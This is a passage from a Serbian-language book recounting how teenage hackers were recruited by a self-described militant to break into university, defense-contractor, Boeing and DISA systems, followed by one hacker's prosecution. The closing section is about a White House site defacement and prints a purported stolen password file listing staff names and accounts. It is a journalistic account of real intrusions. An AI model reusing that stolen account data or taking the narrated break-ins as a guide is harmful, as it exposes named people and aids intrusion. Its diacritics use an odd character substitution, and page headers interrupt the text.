cijalni sauåesnici maçe oprezni i sumçiåavi.
A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolara
da upadne u raåunarske mreæe jednog kineskog univerziteta – mesto
koje ne0h naziva “kineski MIT” (MIT – Tehnoloãki institut Masaåuset-
sa) – i iz baze nabavi podatke o studentima. Pretpostavio je da je to test i
za çegove hakerske sposobnosti i za çegovu genijalnost: kako da upad-
nete u raåunarski sistem kada ne umete da åitate jezik? I joã teæe: kako da
se laæno predstavite kada ne govorite jezik?
Ispostavilo se da jezik nije nikakva prepreka za nekog kao ãto je ne0h.
Poåeo je da boravi na IRC prezentacijama koje je koristila hakerska
grupa gLobaLheLL i preko te grupe se povezao sa studentom raåunar-
28 skih nauka na kineskom univerzitetu. Povezao se s çim i zatraæio neko-
liko korisniåkih imena i lozinki. Informacije za prijavàivaçe stigle su
Umeñe provale

ubrzo zatim, po sistemu haker hakeru, bez postavàaça pitaça. ne0h je


otkrio da je bezbednost raåunara na univerzitetu bila slaba do uæasna, ãto
je naroåito neobiåno za tehniåki univerzitet za koji bi se oåekivalo da
moæe mnogo boàe. Veñina studenata imala je lozinke iste kao korisniåka
imena – istu reå ili frazu.
Kratka lista koju je student dostavio bila je dovoàna da ne0h dobije
pristup kako bi mogao da poåne elektronsko “çuãkaçe”. Tako je otkrio
studenta – zvañemo ga Åeng – koji je pristupao FTP prezentacijama
(za preuzimaçe podataka) u SAD. Meœu tim FTP lokacijama, bila je i
“warez” prezentacija – mesto za preuzimaçe piratskog softvera. Koristeñi
standardan trik laænog predstavàaça, ne0h je skitao po mreæi fakulteta i
skupàao lokalni studentski æargon. To je bilo lakãe nego ãto se åini jer
“oni uglavnom govore engleski”, kaæe ne0h. Sa Åengom se povezao pre-
ko naloga koji je omoguñio da sve izgleda kao da mu ne0h ãaàe poruke
iz laboratorije za raåunarske nauke na fakultetu.
“Ja sam iz Bloka 213”, elektronski je rekao Åengu, i direktno mu
zatraæio imena studenata i adrese e-poãte, kao ãto bi uradio svaki drugi
student zainteresovan za kontakt s kolegama. Poãto je veñina lozinki
bila jednostavna, ulazak u studentske datoteke nije iziskivao previãe
mozgaça.
Vrlo brzo mogao je da isporuåi Kalidu podatke iz baze o otprilike sto
studenata. “Dao sam mu to, a on je rekao: ’Imam sve ãto mi treba‘.” Ka-
lid je bio zadovoàan. Oåigledno mu ta imena uopãte nisu trebala, samo
je hteo da vidi moæe li ne0h zaista da pribavi informacije iz tako udaàe-
nog izvora. “Otprilike tada je poåela naãa veza”, kaæe ne0h. “Mogao sam
da obavim posao, on je to znao, i poåeo je da mi daje druge zadatke.”
Rekavãi da ñe mu ugovorenih hiàadu dolara poslati poãtom, Kalid je
poåeo da zivka mobilnim otprilike jednom nedeàno, kako kaæe ne0h,
“obiåno dok je vozio”. Sledeñi zadatak bio je upad u raåunarski sistem
indijskog Centra za istraæivaçe atomske energije (Bhabha Atomic Re-
search Center). Centar je koristio radnu stanicu Sun koja je poznata
svim hakerima. ne0h je lako uãao u çu, ali je otkrio da maãina ne sadræi
nikakve zanimàive informacije i da je samostalna – nije povezana ni sa
jednom mreæom. Kalid nije delovao zabrinuto zbog neuspeha.
U meœuvremenu, novac za upad u kineski univerzitet nije stigao.
Kada je ne0h pitao za çega, Kalid se iznervirao. “Nisi ga dobio? Poslao
sam ti keã u roœendanskoj åestitki!”, tvrdio je. Bila je to otrcana fraza: 29
“Poslali smo åek poãtom”, ali je ne0h ipak rado nastavio da prihvata

Poglavlje 2: Kad teroristi pozovu


zadatke. Zaãto? Danas odgovor na to traæi introspekcijom.
Nastavio sam jer sam tvrdoglav. Uzbuœivala me je pomisao da
ñu biti plañen za to ãto radim. I mislio sam: “Moæda se novac
stvarno usput zaturio, moæda ñe mi ovaj put platiti.”
Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode?
Æeœi za novcem? Æudçe za moñi? Mogao bih nabrojati mnogo
razloga.
U isto vreme dok je dodeàivao zadatke da ih ne0h reãava, Kalid je
krstario IRC prezentacijama traæeñi druge zainteresovane igraåe. Com-
rade je bio zainteresovan, mada je bio oprezan kada je trebalo prihvatiti
novac.
Koliko sam shvatio, on je plañao àudima, ali ja nikada nisam
hteo da mu dam svoje podatke kako bih primio novac. Pomi-
slio sam – to ãto ja radim samo je razgledaçe, ali ako poånem
da primam pare, postañu pravi kriminalac. S çim sam uglav-
nom razgovarao preko IRC-a i s vremena na vreme mu doba-
civao poneku datoteku sa IP adresama sistema.
Novinar Nil Makaj razgovarao je s joã jednom ribom koju je Kalid
upecao u svoju mreæu – tinejdæerom iz Kalifornije åija je identifikacija
bila Kameleon (Chameleon), i koji je danas suosnivaå uspeãne kompani-
je za bezbednost. Priåa koju je Makaj objavio na prezentaciji wired.com1,
poklapala se sa detaàima koje su ispriåali ne0h i Comrade. “Jedne noñi
sam bio na IRC-u kada je taj tip rekao da mu treba DEM softver. Ja ga
nisam imao i samo sam se izmotavao s çim”, tvrdio je haker. Kalid se u
to vreme veñ uozbiàio: “DEM” je skrañenica za Defense Information Sy-
stems Network Equipment Manager – softver za mreæe koji je koristila
vojska. Program je skinula grupa hakera Masters of Downloading, i
kruæile su glasine da do çega moæete doñi ako ga zatraæite od prave oso-
be. Niko ne zna da li se Kalid ikada doåepao tog programa – ili bar niko
neñe da prizna. Zapravo, nije potpuno sigurno ni da bi mu taj softver iãta
vredeo – ali on je oåigledno mislio da bi. Kalid je zavrãio svoje igre s ki-
neskim univerzitetima i sliånim sitnim poslovima.
“Pokuãao je da se ukàuåi u ono ãto su momci u grupi radili”, priåao
30 nam je ne0h. Kalid se javàao hakerima tokom godinu i po dana: “Nije
bio neko ko bi se sporadiåno pojavàivao, javàao se redovno. Bio je tu i
Umeñe provale

svi su znali da je to çegova stvar”. Kada kaæe “çegova stvar”, ne0h mi-
sli na upadaçe u vojne prezentacije ili raåunarske sisteme komercijal-
nih kompanija koje rade na vojnim projektima.
Kalid je traæio da ne0h upadne u Lockheed Martin i nabavi ãeme
odreœenih avionskih sistema koji su se u toj kompaniji pravili za Boing.
ne0h je uspeo da delimiåno prodre u Lockheed, “oko tri koraka u unu-
traãçu mreæu”, ali nije uspeo da ode dubàe od dva servera (doãao je do
nivoa koji àudi iz bezbednosti nazivaju “demilitarizovana zona” ili
“DMZ” – niåija zemàa). To nije bilo dovoàno da proœe barijere koje su
ãtitile najosetàivije korporacijske podatke, i nije mogao da pronaœe za-
htevane informacije.
[Kalid] se razdraæio. Otprilike je rekao: “Viãe ne radiã za me-
ne. Ne moæeã niãta da obaviã”. Ali onda me je optuæio da sam
zadræao informacije za sebe.
Potom je rekao: “Zaboravi Lockheed Martin. Idi direktno na
Boing.”
ne0h je otkrio da Boing “nije toliko obezbeœen, ako se dovoàno
potrudite”. On je upao iskoristivãi poznatu slabost Boingovog sistema –
izloæenost Internetu. Poãto je instalirao “çuãkalo” (program za nadgle-
daçe protoka podataka, engl. sniffer), mogao je da osluãkuje sve pakete
podataka koji su ulazili u raåunar i izlazili iz çega – program je radio
kao prisluãni ureœaj za raåunare. Tako je doãao do lozinki i neãifrovanih
e-poruka. Informacije koje je skrpio iz e-poruka otkrile su dovoàno
podataka za ulazak u internu mreæu.
Pronaãao sam ãest ili sedam ãema za vrata i nos Boinga 747 –
samo prolazeñi kroz tekstualne e-poruke. Ljudi su slali neãifro-
vane priloge uz poruke. Zar to nije sjajno?! (Tu se zasmejao.)
Kalid je bio ushiñen. Rekao je da ñe mi dati 4.000 dolara. To
se, naravno, nikada nije desilo.
Zapravo, 4.000 dolara bi bilo previãe za te informacije. Sudeñi po biv-
ãem direktoru bezbednosti Boinga, Donu Belingu, ovaj upad se moæda
zaista desio kao ãto je opisano. Meœutim, on bi bio åisto gubàeçe vre-
mena: kada nov tip aviona uœe u eksploataciju, sve putniåke agencije do-
bijaju kompletne skupove ãema. U tom trenutku, te informacije se viãe 31
ne smatraju osetàivim. Moæe ih dobiti svako ko poæeli. “Nedavno sam

Poglavlje 2: Kad teroristi pozovu


na lokaciji eBay video i CD sa ãemama za 747”, rekao je Don. Naravno,
Kalid to verovatno nije znao. Proãlo je dve godine dok nacija nije otkrila
da su neki teroristi imali jake razloge da æele ãeme glavnih putniåkih
aviona koje koriste ameriåke avionske kompanije.

Veåeraãça meta: SIPRNET


Kalid se nije trudio da Comradeu daje probne zadatke. Od samog po-
åetka, priåa ovaj haker, Kalida “su zanimali samo vojska i SIPRNET”.
On uglavnom nije konkretno govorio ãta hoñe – hteo je pristup
vladinim i vojnim prezentacijama. Osim kada je u pitaçu
bio SIPRNET. Informacije sa SIPRNET-a je zaista æeleo.
Nije ni åudo ãto je Kalid æudeo za tim podacima. Oni su verovatno
bili çegov cià od samog poåetka. SIPRNET je deo mreæe odbrambe-
nog informacionog sistema, DISN-a (engl. Defense Information System
Network), koji prenosi poveràive poruke. Ãtaviãe, SIPRNET (skrañeni-
ca za Secret Internet Protocol Router Network) sada je sræ komando-
vaça i kontrole u vojsci SAD.
ne0h je veñ odbio Kalidovu ponudu da prodre u SIPRNET:
Ponudio je 2.000 dolara. Odbio sam ga. Da sam uãao u SI-
PRNET, federalci bi mi zaåas doãli na vrata. 2.000 dolara
nije vredno rupe u glavi.
Kada je Kalid razgovarao s Comradeom o tom zadatku, cena je sko-
åila. “Mislim da je rekao da ñe platiti deset hiàada dolara za pristup”,
priseña se Comrade. To je bila dobra pogodba àudima koji se nisu sne-
bivali da prihvate projekte. Ipak, on tvrdi da ga je u iskuãeçe bacio iza-
zov, a ne novac.
U stvari, SIPRNET-u sam se dosta primakao. Uãao sam u je-
dan raåunarski sistem u DISA (Defense Information Security
Agency).Taj raåunar je bio izuzetno dobar. Mislim da je imao
åetiri procesora, oko 2.000 àudi je imalo pristup, Unixova da-
toteka sa IP adresama imala je oko 5.000 razliåitih servera, a
polovina je koristila privilegovane naloge. Morao si da budeã
32 za tim raåunarom da bi mu pristupio – nisi to mogao da ura-
diã spoàa.
Umeñe provale

Kako god da je to zakàuåio, Comrade je ispravno slutio da je nabasao


na neãto bitno. Glavne misije DISA ukàuåuju zdruæenu komandu i kon-
trolu, i raåunarsku podrãku jedinicama u borbi – mudro preklapaçe sa
funkcijama SIPRNET-a. Meœutim, çegovi napori su saseåeni.
Bilo je simpatiåno imati sve te pristupe, ali nisam imao dovoà-
no vremena da se time poigram i uradim neãto. Ukebali su me
tri ili åetiri dana kasnije.

Vreme za zabrinutost
Na Boæiñ 1999, ne0h i Comrade su doæiveli ãok. Let IC-814 Indian
Airlinesa, na pravcu Katmandu – Nju Delhi, sa 178 putnika i 11 ålano-
va posade, otet je u toku leta. Reporteri su javili da su otimaåi bili paki-
stanski teroristi povezani s Talibanima. Teroristi kao ãto je Kalid?
Pod komandom otmiåara, Airbus A300 nastavio je cik-cak putaçom
do Sredçeg Istoka i nazad, nakratko sletevãi u Indiji, Pakistanu i Ujedi-
çenim Arapskim Emiratima, gde je izbaåeno telo zaklanog putnika. Bio
je to mlad åovek koji se sa tek venåanom suprugom vrañao kuñi s mede-
nog meseca. On je na smrt izboden jer je odbio da stavi povez na oåi.
Avion je konaåno sleteo u Kandahar u Avganistanu – ãto je dodatno
ukazivalo na vezu s Talibanima. Preostali putnici i posada zadræani su u
avionu tokom osam dana ispuçenih terorom, i na kraju su puãteni u
zamenu za oslobaœaçe tri uhapãena militanta. Jedan od osloboœenih
zatvorenika, Ãeik Umer, kasnije je pomogao u finansiraçu Mohameda
Ate, voœe napada na Svetski trgovinski centar 11. septembra.
Nakon otmice, ne0h je saznao od Kalida da je çegova grupa odgo-
vorna i da je i on sâm uåestvovao u otmici.
Na smrt sam se uplaãio. On je bio loã. Oseñao sam da moram
da saåuvam æivu glavu.
Ali çegovu zabrinutost ublaæavala je deåaåka pohlepa. “I daàe sam
se nadao da ñe mi isplatiti moj novac”, dodao je ne0h.
Veza sa otmicom dolila je uàe na vatru koju je Kalid ranije zapalio.
U jednom trenutku, oåigledno iznerviran neuspeãnim pokuãajima ti-
nejdæera da mu pribave informacije koje je traæio, Kalid je pokuãao s
33
taktikom visokog pritiska. Novinar Nil Makaj, u ranije navedenoj priåi
za wired.com, napisao je da je video staru poruku na IRC-u koju je Ka-

Poglavlje 2: Kad teroristi pozovu


lid poslao ovim mladiñima i u kojoj je pretio da ñe ih ubiti ako ga prija-
ve Federalnom istraænom birou. Makaj je napisao da je video i sledeñu
poruku od Pakistanca: “Hoñu da znam: da li je [iko] priåao federalcima
o meni?” A na drugom mestu: “Reci im [ako to urade] da su mrtvi. Na-
huãkañu snajperiste na çih.”2

Comrade je uhapãen
Situacija je postala gusta, a uskoro ñe se i pogorãati. Nekoliko dana poãto
je Comrade uspeo da prodre u sistem povezan sa SIPRNET-om, çe-
govog oca je na putu do posla zaustavila policija. Rekli su mu: “Hoñemo
da razgovaramo s tvojim sinom”, i pokazali mu nalog za pretres. Comra-
de se priseña:
Bilo je tu àudi iz NASA, Ministarstva odbrane, FBI-ja. Sve u
svemu, bilo je oko deset ili dvanaest agenata, i nekoliko polica-
jaca. Petàao sam po nekim Nasinim sanduåiñima, postavio
sam “çuãkalo” na ns3.gtra.mil da bih pokupio lozinke. Ali,
tako sam pokupio i e-poruke. Rekli su mi da sam zbog toga
optuæen za nelegalno prisluãkivaçe. A za Nasine raåunare do-
bio sam krãeçe zaãtiñenih prava. I druge stvari.
Samo dan ranije, prijateà mi je rekao: “Åoveåe, uskoro ñe nas
uhvatiti”. Odlepio je. Pomislio sam: “U pravu je”. Zato sam
obrisao svoj disk.
Meœutim, Comrade nije bio temeàan pri åiãñeçu. “Zaboravio sam
stare diskove koji su mi stajali na stolu.”
Ispitivali su me. Priznao sam. Rekao sam: “Æao mi je. Evo ãta
sam uradio, evo kako ñete popraviti, viãe to neñu raditi.” A oni
su rekli, kao: “U redu, neñemo te tretirati kao kriminalca. Ne-
moj to viãe da radiã. Ako to ponovo uradiã, ne ginu ti lisice.”
Spakovali su moje raåunare, periferne ureœaje i rezervne di-
skove, i otiãli.
Kasnije su pokuãali da nateraju Comradea da im kaæe lozinku za svo-
34
je ãifrovane diskove. Kada je odbio, rekli su da znaju kako da ih provale.
Comrade je mislio da ne mogu: koristio je PGP ãifrovaçe i lozinka mu
Umeñe provale

je bila “duga oko sto znakova”. Ipak, on tvrdi da nije bila teãka za
pamñeçe – bila su to çegova tri omiàena citata spojena u niz.
Oko ãest meseci nije imao kontakta s policijom. A onda je jednog
dana åuo da ñe vlada podneti tuæbu. Do trenutka kada je dospeo na sud,
bio je optuæen za, kako je tuæilac tvrdio, tronedeàno iskàuåivaçe Nasi-
nih raåunara i presretaçe hiàada poruka unutar Ministarstva odbrane.
(Kao ãto i sâm vrlo dobro znam, “ãteta” koju tuæioci navode i stvarna
ãteta ponekad su veoma razliåite. Comrade je iz Nasinog centra Marshall
Space Flight u Alabami preuzeo softver koji se koristi za kontrolisaçe
temperature i vlaænosti u meœunarodnoj svemirskoj stanici. Vlada je tvr-
dila da je zbog toga morala da na tri nedeàe iskàuåi odreœene raåunarske
sisteme. Napad na Ministarstvo odbrane pruæio je realistiåniji razlog za
brigu: Comrade je provalio u raåunarski sistem Odbrambene agencije za
ublaæavaçe pretçi (engl. Defense Threat Reduction Agency) i instalirao
“zadça vrata” koja su mu omoguñila pristup u bilo koje vreme.)
Vlada je oåigledno ovaj sluåaj smatrala bitnim za upozoravaçe osta-
lih hakera tinejdæera. U medijima je suœeçu posveñena velika paæça i
Comrade je proglaãen najmlaœom osobom koja je ikada osuœena za ha-
kerisaçe kao federalni zloåin. Glavni tuæilac Dæenet Rino je åak dala iz-
javu u kojoj kaæe: “Ovaj sluåaj, u kom ñe prvi put maloletni haker
sluæiti zatvorsku kaznu, pokazuje da ozbiàno shvatamo raåunarske upa-
de i da sa svojim partnerima iz kriminalistiåke sluæbe radimo na agresiv-
noj borbi protiv ovih pojava”.
Sudija je Comradea osudio na ãest meseci zatvora i ãest meseci uslov-
ne kazne, s poåetkom nakon zavrãetka polugodiãta. Comradeova majka
je tada joã bila æiva. Angaæovala je novog advokata, napisala mnogo pi-
sama, sudiji je prikazala “potpuno nov sluåaj” i, za divno åudo, uspela
da smaçi kaznu na kuñni pritvor i potom åetiri godine uslovne kazne.
Ponekad u æivotu ne koristimo ãanse koje nam se pruæaju. “Odsluæio
sam kuñni pritvor i u toku je bila uslovna kazna. Razne stvari su se desile,
poåeo sam previãe da se zabavàam, pa su me poslali na rehabilitaciju.”
Kada je rehabilitacija proãla, Comrade se zaposlio u Internet kompaniji i
zapoåeo sopstveni posao sa Internetom. Meœutim, on i sluæbenik za us-
lovnu kaznu nisu su previãe viœali, pa je Comrade na kraju ipak otiãao u 35
zatvor. Imao je samo ãesnaest godina, a zatvoren je za dela koja je poåinio

Poglavlje 2: Kad teroristi pozovu


kada je imao petnaest.
U federalnom kaznenom sistemu nema tako mnogo maloletnika.
Ispostavilo se da su ga poslali u “kamp” (prava reå za to mesto) u Alaba-
mi, u kom je bilo samo deset zatvorenika. Comrade za kamp kaæe da je
“viãe nalik ãkoli – zakàuåana vrata i ograda od bodàikave æice, ali inaåe
nije imalo mnogo veze sa zatvorom”. Åak nije morao da ide na åasove
jer je veñ zavrãio sredçu ãkolu.
Kada se vratio u Majami i na sluæeçe uslovne kazne, Comrade je do-
bio spisak hakera s kojima ne sme da razgovara. “Na listi je pisalo, ovaj
tip, onaj tip i – ne0h.” Samo “ne0h” – federalna vlada ga je znala samo
po identifikaciji. “Nisu imali pojma ko je on. Ako sam ja imao pristup
do dve stotine stvari, on je imao pristup do hiàadu”, kaæe Comrade.
“ne0h je bio priliåno veãt.” Koliko oni znaju, kriviåni organi joã uvek
nisu uspeli da otkriju çegovo ime ili lokaciju.

Ispitivaçe Kalida
Da li je Kalid bio militant kao ãto je tvrdio, ili samo prevarant koji je
manipulisao tinejdæerima? Ili je to moæda bila operacija Federalnog istra-
ænog biroa kojom su isprobavali koliko daleko su mladi hakeri voàni da
idu? Pre ili kasnije, svaki haker koji je imao posla s Kalidom posumçao
je da on nije zaista bio militantni aktivista. Åini se da ih je pomisao da su
informacije davali stranom agentu muåila maçe od moguñnosti da ih je
taj tip samo navukao. Comrade kaæe da se “najviãe pitao ãta je [Kalid]
bio. Nisam znao da li je federalac ili je bio ono ãto je tvrdio. Na osnovu
razgovora koji su vodili ne0h i Kalid, zakàuåio sam da ne laæe. Ali nikada
od çega nisam uzeo novac – to je bila granica koju nisam hteo da
preœem.” (Ranije u razgovoru, kada je prvi put pomenuo deset hiàada
dolara koje je Kalid ponudio, Comrade je zvuåao impresioniran sumom.
Da li bi odbio novac ukoliko bi çegovi pokuãaji bili uspeãni, a Kalid mu
zaista platio? Moæda ni sam Comrade ne zna da odgovori na to pitaçe.)
ne0h kaæe da je Kalid “zvuåao potpuno profesionalno” ali priznaje
da se povremeno pitao je li ovaj zaista militantni aktivista. “Sve vreme
dok sam razgovarao s çim, mislio sam da previãe baàezga. Ali nakon
istraæivaça s prijateàima koji su s çim razgovarali i kojima je davao
36 druge informacije, zakàuåili smo da je zaista bio ono ãto je tvrdio.”
Haker Savec0re je na IRC-u sreo nekoga ko je rekao da u FBI ima
Umeñe provale

strica koji bi mogao da sredi imunitet za celu hakersku grupu Mil-


w0rm. “Mislim da bismo time poslali poruku FBI-ju da nismo neprija-
teàski nastrojeni”, Savec0re je rekao Makaju u intervjuu putem e-poãte.
“Dao sam mu moj broj telefona. Sledeñeg dana me je pozvao navodni
FBI agent sa zaåuœujuñe jakim pakistanskim akcentom.”
“Rekao je da se zove Majkl Gordon i da je radio za FBI u Vaãingto-
nu”, Savec0re je ispriåao novinaru. “Shvatio sam da je to sve vreme bio
Ibrahim.” Mada su se neki àudi pitali da li je navodni terorista bio tajni
agent Federalnog istraænog biroa, Savec0re je doãao do suprotnog za-
kàuåka: da je tip koji je tvrdio da je FBI agent u stvari isti terorista koji je
pokuãavao da vidi jesu li su momci spremni da propevaju o çemu.
Ideja da je to moæda bila operacija FBI-ja nema åvrste osnove. Uko-
liko je federalna vlada htela da otkrije za ãta su ovi klinci sposobni i ko-
liko daleko su spremni da idu, obeñani novac bi stigao. Kada FBI
pomisli da je situacija dovoàno ozbiàna da zahteva angaæovaçe tajnog
agenta, oni u taj trud ulaæu novac. Neverovatno bi bilo da su obeñali
1000 dolara, a da to nisu platili.
Izgleda da je samo jedan haker zaista dobio novac od Kalida – Ka-
meleon. “Jedno jutro sam otiãao do sanduåeta i u çemu je bio åek na
hiàadu dolara s brojem koji treba da pozovem u Bostonu”, ispriåao je
Kameleon u priåi za Wired News (4. novembra 1998). Kalid je saznao
da on ima mape vladine raåunarske mreæe – åek je bio uplata za te
mape. Kameleon je unovåio åek. Dve nedeàe kasnije FBI mu je upao u
kuñu i ispitivao ga o isplati, ãto pokreñe zanimàivo pitaçe o tome kako
je vlada saznala za tih hiàadu dolara. To se desilo pre 11. septembra,
dok se FBI fokusirao na domañi kriminal i slabo pratio teroristiåke pret-
çe. Kameleon je priznao da je uzeo novac, ali je novinaru Wired Newsa
tvrdio da nije dao nikakve mape vladine mreæe.
Mada je Kameleon priznao da je uzeo novac od stranog teroriste, za
ãta bi mogao biti optuæen za ãpijunaæu i dobiti veoma dugu zatvorsku
kaznu, nikakva optuænica nije bila podignuta – ãto daàe produbàuje
misteriju. Moæda je vlada samo htela da se po hakerskoj zajednici pro-
åuje da saraœivaçe sa stranim agentima moæe biti riziåno. Moæda åek i
nije bio od Kalida, veñ od FBI-ja.
Samo nekoliko àudi zna Kameleonov pravi identitet, i on bi voleo
da tako i ostane. Hteli smo da åujemo çegovu verziju priåe. Odbio je 37
da govori o tome (samo pomenuviãi kako je mislio da je Kalid u stvari

Poglavlje 2: Kad teroristi pozovu


federalac koji se predstavàa kao terorista). Da sam na çegovom mestu,
ni ja ne bih hteo da me intervjuiãu na tu temu.

Organizacija Harkat ul-Mudæahedin


Dok je pretraæivao dnevnike interaktivnih razgovora na Internetu, no-
vinar Makaj je otkrio da se Kalid jednom prilikom predstavio mladim
hakerima kao ålan organizacije Harkat-ul-Ansar3. Sudeñi po Pregledu
obaveãtajne sluæbe Juæne Azije (South Asia Intelligence Review), “SAD
su proglasile Harkat-ul-Ansar teroristiåkom organizacijom zbog çihove
veze s proteranim saudijskim teroristom Osamom Bin Ladenom 1997.
Da bi se izbegle posledice ameriåke zabrane, grupa je 1998. promenila
ime u Harkat ul-Mudæahedin.”4
Ministarstvo inostranih poslova SAD iznova je upozoravalo na tu
grupu. Jedna çihova objava kaæe: “Pakistanski zvaniånici su izjavili da su
u ameriåkim vazduãnim napadima 23. oktobra [2001] ubijena 22 pa-
kistanska gerilca koji su se borili uz Talibane u blizini Kabula. Poginuli
su bili ålanovi organizacije Harkat ul-Mudæahedin... [koju] je Ministar-
stvo inostranih poslova postavilo na zvaniånu listu teroristiåkih organi-
zacija 1995.”5
Zapravo, Harkat je danas jedna od trideset ãest grupa koje su u SAD
oznaåene kao strane teroristiåke organizacije. Ameriåka vlada ih, dru-
gim reåima, smatra najgorim àudima na kugli zemaàskoj.
Naravno, mladi hakeri to nisu znali. Za çih je sve bila samo igra.
Govoreñi u aprilu 2002. o bezbednosti informacija, general-major
indijskih vojnih snaga, potvrdio je da je Kalid terorista, ispriåavãi o
hakerskim vezama sa “Kalidom Ibrahimom iz organizacije Harkat-ul-
Ansar smeãtene u Pakistanu”.6 General se, meœutim, pribojavao da Ka-
lid nije u Pakistanu veñ u Delhiju, u Indiji.

Posledice 11. septembra


Neki hakeri manipuliãu i obmaçuju. Oni varaju raåunarske sisteme
navodeñi ih da pomisle kako imaju ovlaãñeça koja su zapravo ukrali.
Oni veæbaju laæno predstavàaçe da bi manipulisali àudima i postigli
svoje ciàeve. Sve to znaåi da, kada govorite s hakerom, morate sluãati
38 paæàivo i utvrditi da li ono ãto vam govori, i naåin na koji to govori,
zvuåi uveràivo. Ponekad prosto neñete biti sigurni.
Koautor ove kçige i ja nismo bili sigurni u ono ãto nam je ne0h re-
Umeñe provale

kao o svojoj reakciji na 11. septembar. Poverovali smo mu toliko da vam


prenesemo çegovu izjavu.
Znate li koliko sam plakao tog dana? Bio sam siguran da je go-
tovo s mojim æivotom.
Te reåi je propratio åudnim, nervoznim smehom – s kojim znaåe-
çem? Nismo mogli da odredimo.
Pomisao da sam imao veze s tim. Da sam uãao u Lockheed
Martin ili Boing i doãao do joã informacija, mogli su da ih is-
koriste. Bilo je to loãe vreme za mene i za Ameriku.
Plakao sam jer nikada nisam pomislio na to da ga prijavim.
Nisam dobro rasuœivao. To je bio razlog zbog kog me je anga-
æovao da uradim sve te stvari...
[Pomisao] da sam i malim prstom uåestvovao u onom ãto se
desilo s Trgovinskim centrom... u potpunosti me je skrhala.
U Svetskom trgovinskom centru stradala su tri moja druga.
Nikada se nisam oseñao tako loãe.
Mnogi hakeri su tinejdæeri, pa åak i mlaœi. Da li je to prerano da bi
se prepoznala potencijalna opasnost ili reagovalo na zahteve nekoga ko
bi mogao predstavàati pretçu zemài? Mislim da su nakon 11. septem-
bra ameriåki hakeri – åak i oni veoma mladi – postali sumçiåavi i da je
malo verovatno da ñe ih teroristi prevariti. Nadam se da sam u pravu.
Upad u Belu kuñu
Istorija raåunarske bezbednosti u neku ruku ima sliånosti s davnom
istorijom kriptografije. Vekovima su àudi smiãàali ãifre koje su oznaåa-
vali kao “nemoguñe za otkrivaçe”. Åak i danas, u eri raåunara koji
mogu brzo ãifrovati poruku pomoñu kàuåa za jednokratnu upotrebu, ili
kàuåa koji sadræi stotine znakova, veñina kodova i daàe se moæe deãi-
frovati. (Ameriåka organizacija za ãifrovaçe i deãifrovaçe, Agencija za
nacionalnu bezbednost – engl. National Security Agency, razmeñe se bro-
jem najveñih, najbræih i najmoñnijih raåunara na svetu.)
Bezbednost raåunara je kao stalna igra maåke i miãa u kojoj su struå-
39
çaci za bezbednost na jednoj strani, a upadaåi na drugoj. Operativni si-
stem Windows sadræi desetine miliona redova koda. Sasvim je jasno da

Poglavlje 2: Kad teroristi pozovu


svaki ogroman softver mora da sadræi slabosti koje ñe posveñeni hakeri
pre ili kasnije otkriti.
U meœuvremenu, radnici u kompanijama, åinovnici, ponekad i profe-
sionalci u oblasti bezbednosti, instalirañe nov raåunar ili program i za-
boraviti da promene podrazumevanu ãifru, ili se neñe potruditi da smisle
ãifru koja je bar donekle sigurna – ostavàajuñi ureœaj u raçivom staçu.
Ako åitate vesti o hakerskim napadima i upadima, znate da su vojne
i vladine prezentacije, åak i Web prezentacija Bele kuñe, veñ ugroæene.
Ponekad neprestano.
Upad na prezentaciju i meçaçe Web strane je jedno – to je uglav-
nom trivijalna, ili bar dosadna stvar. I pored toga, mnogi àudi se osla-
çaju na samo jednu lozinku koju koriste svuda. Ukoliko provaàivaçe
u Web prezentaciju vodi do hvataça lozinki, napadaå moæe dospeti u
situaciju da ima pristup ostalim sistemima u mreæi i moæe da napravi
mnogo veñu ãtetu. ne0h kaæe da su 1999. godine on i joã dva ålana ha-
kerske grupe gLobaLheLL uradili upravo to, na jednom od najosetài-
vijih mesta u SAD-u – u Beloj kuñi.
Mislim da su u Beloj kuñi reinstalirali operativni sistem. Sve
su vratili na podrazumevane vrednosti. I u tom periodu, u tra-
jaçu od deset, petnaest minuta, Zyklon i MostFearD uspeli su
da uœu, doœu do skrivene datoteke lozinki, provale je, uœu, i
promene Web prezentaciju. Bio sam tamo dok su to radili.
Trebalo je samo da budu na pravom mestu u pravo vreme.
Desilo se sluåajno – bila je åista sreña da su se zadesili na vezi
baã kada je neko radio na prezentaciji.
O tome smo priåali u priåaonici grupe gLobaLheLL. Probudio
me poziv oko 3 ujutro kojim su me obavestili ãta se deãava. Re-
kao sam: “Baàezgaã. Dokaæi.” Skoåio sam za raåunar. I stvar-
no, uradili su to.
MostFearD i Zyklon obavili su najveñi deo posla. Dali su mi
skrivenu datoteku da je provalim ãto bræe mogu. Doãao sam do
jedne [lozinke] – bila je to obiåna reå iz reånika. I to je bilo to.
ne0h nam je dao deo koda za koji kaæe da je datoteka lozinke koju su
ostali nabavili i preneli mu. U çoj je naizgled nabrojano nekoliko ov-
40
laãñenih korisnika, ålanova osobàa Bele kuñe7:
root:x:0:1:Super-User:/:/sbin/sh
Umeñe provale

daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:6001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh
orion:x:1002:10:Christopher
Adams:/usr/users/orion:/usr/ace/sdshell
webadm:x:1130:101:Web
Administrator:/usr/users/webadm:/bin/sh
cadams:x:1003:10:Christopher
Adams:/usr/users/cadams:/usr/ace/sdshell
bartho_m:x:1004:101:Mark
Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell
monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh
debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh
connie:x:1149:101:Connie
Colabatistto:/usr/users/connie:/bin/sh
bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
Ovo je vrsta Unixove ili Linuxove datoteke lozinki, kakva se koristi
za skladiãteçe ãifrovanih lozinki u posebnoj, zaãtiñenoj datoteci. Svaki
red navodi ime jedne osobe koja ima nalog na sistemu. Unos “sdshell” u
nekim redovima nagoveãtava da ti korisnici, zbog dodatne sigurnosti,
imaju mali elektronski ureœaj nazvan “RSA SecureID”. On prikazuje
